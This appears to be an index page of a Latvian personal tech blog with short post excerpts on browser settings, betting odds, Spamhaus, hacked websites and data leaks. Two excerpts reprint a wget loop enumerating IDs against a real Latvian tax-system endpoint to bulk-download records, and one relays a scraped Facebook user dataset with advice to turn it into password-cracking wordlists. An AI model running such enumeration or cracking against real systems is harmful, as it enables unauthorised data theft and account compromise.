•
Rakstot iepriekšējo post bija nepieciešams pārbaudīt vai pirms redirekta no hanzanet.lv ir uzstādīts jaunos sertifikāts.
Vieglākais kā to izdarīt manupŗat bija aizliegt pārlūkam veikt auto redirect.
Firefox to var izdarīt šādi:
Atveram konfig failu- adreses vietā irakstām about:config
Atrodam- network.http.redirection-limit
un vērtību aizstājam ar 0.
Pēc eksperimenta nomainām uz kādu gribās.
Pārlūku nav nepieciešams pārstartēt.
•
Vakar papētīju kāda ir varbūtība nevinnēt vairākas reizes pēc kārtas arī pie varbūtības 50/50.
Rezultāts bija diezgan šokējošs- 29 reizes.
Tāpēc mājās pamodificēju skriptu, lai noskaidrotu kāda iespēja neuzminēt vairākas reizes pēc kārtas, ka iespēja laimēt ir 70% un 95%.
To izdarīju izmainot uz :
//$gad1=rand(1,100);
$gad2=rand(1,100); Talak »
•
Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?
Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu 
Talak »
•
Atgadījumu ar Spamhaus jau ir komentēts un apspriests daudz kur, piemēram, Apollo.lv vai Pods.lv un ir pieejams raksts arī theregister.co.uk.
Īsam ievadam- bija izveidojusies situācija, ka liela daļa LV IP nonāca epasta black listā un tāpēc daudziem korekti nestrādāja epasts.
Beigās pievienoju no ISACA paneļdiskusijas ierakstu- kas tad īsti bija noticis un kāpēc tas nav tik vienkārši, nevainīgi vai labi (nemākam angļu valodu- Spamhaus atrakstīšanās „are the result of language barriers” vai paši vainīgi), kā izklausās no sākuma.
Ieraksts diezgan sliktā kvalitātē un bez iespējas paskatīties prezentāciju, bet iespējams uzzināsiet ko jaunu.
Un tāpēc gribēju uzsvērt pāris lietas, kuras, manuprāt, neparādījās ne vienā no šiem (pods, apollo, datuve) resursiem:
• paralēli tam arī tika bloķēts Latnet epasta serveris, kuram nebija nekāda sakara ar negadījumā iesaistītām IP adresēm (Tāpēc ir ļoti pamatotas NIC dusmas, jo tā bija liela Spamhaus kļūda).
•
Pēc drauga datora pārinstalācijas dators nevarēja saņemt tam nepieciešamos atjauninājumus un izdeva kļūdas paziņojumu nr 80072F8F.
Ilgu laiku nevarēju saprast ko tas nozīmē- lamāju XP draiverus, jo W7 atbalsta tiem vairs nebija (laptops morāli novecojis) iekams nodomāju pagooglēt. Pēc 1min jau kļuva skaidrs- problēma datora datuma iestatījumos. Nezin kāda iemesla pēc- laiku rādīja korekti, bet mēnesis bija ar nobīdi. Izlaboju un viss aizgāja.
Man tas liekās interesanti, jo XP laikos ar tādu kļūdu nebiju saskāries un neredzu tam arī nekādu nepieciešamību- PC aizsūta savu pašreizējo stāvokli un update serveris atgriež nepieciešamos updates, kam tur vēl pa vidu ir nepieciešams lokālais datora laiks?
•
Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.
Cerams kādam noderēs.
•
Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.
Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.
Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.
Linux gadījumā tas varētu izskatīties šādā veidā:
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Talak »
•
Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.
Un te seko nākamais pārsteigums- pods izsmiets.
Nu ko vēsture atkārtojas..
Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.
Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.
Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.
Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV
No sava Hackera neaizbēgsi .
•
Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.
Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.
Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.
Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas
•
Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.
•
Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html
Raksta kopija:
Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.
An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.
Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.
Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:
Filename Description
-------------------------------------------------------------------------
facebook.rb The script used to generate these files (v1)
facebook.nse The script that will be used for the second pass (v2)
facebook-urls The full URLs to every profile
facebook-names-original All names, including duplicates
facebook-names-unique All names, no duplicates
facebook-names-withcount All names, no duplicates but with a count
facebook-firstnames-withcount All first names (with count)
facebook-lastnames-withcount All last names (with count)
facebook-f.last-withcount All first initial last name (with count)
facebook-first.l-withcount All first name last initial (with count)
Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.
No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.
Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.
Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.
P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?
Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.
•
Šodien izlasīju tvnet rakstu par uzlauztu Hayley Williams twiter kontu.
Tēma likās interesanta un izdomāju to mazliet papētīt…
Kas tad bija it kā izdarīts?
1. Hackers it kā piekļuva viņas kontam un publicēja “privātu” foto.
2. Viņa pēc 8 min. to pamanīja un bildi izdzēsa. Talak »
•
Izlasīju interesantu piemēru, par to, ka efektivitāte nevienmēr ir svarīgākā un nenoturējos to nepārpublicēt. Secinājumus katrs var izdarīt pats .
Kāds liela uzņēmuma direktors, kas vienlaikus bija arī vietējā orķestra patrons, laika trūkuma dēļ piedāvāja sava uzņēmuma efektīvas pārvaldības vadītajam noklausīties Šuberta Nepabeigto Simfoniju. Talak »
•
Nedēļu atpakaļ draugam pēkšņi Windows 7 paziņoja, ka OS nav īsti godīgi iegūta.
Problēma tika novērsta klasiski- atinstalējot pēdējo Windows update.
Šodien tika piedāvāts uzinstalēt kritisku jauninājumu: Talak »
